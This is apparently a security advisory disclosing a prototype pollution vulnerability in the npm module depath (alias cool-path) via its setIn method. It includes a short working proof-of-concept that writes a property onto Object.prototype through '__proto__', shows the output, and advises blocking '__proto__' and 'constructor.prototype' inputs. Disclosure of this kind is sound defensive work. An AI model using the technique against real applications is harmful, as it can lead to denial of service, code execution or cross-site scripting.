A prototype pollution affecting the module: depath (another alias name: cool-path). An attacker could potentially take advantage of a vulnerability to manipulate the behavior of the vulnerable application by abusing built-in Object properties such as __proto__
.
The vulnerability located at setIn (lib/index.js:90)
. where set()
method
used to unsafely assign source property to the destination. An attacker can be exploit this method to copy malicious property to the built-in Object.prototype through the special properties __proto__
or constructor.prototype
.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.
(async () => {
const lib = await import('depath');
// or const lib = await import('cool-path');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
// uncomment one at a time.
lib.Path.setIn ({}, "__proto__.polluted", true)
//lib.Path.ensureIn ({}, "__proto__.polluted", true)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output of a successful fix:
Before Attack: {}
After Attack: {}
No updates were provided by the maintainer. Users of this module are urged to implement proper santization and validation over user's supplied inputs, such as blocking inputs containing __proto__
and contructor.prototype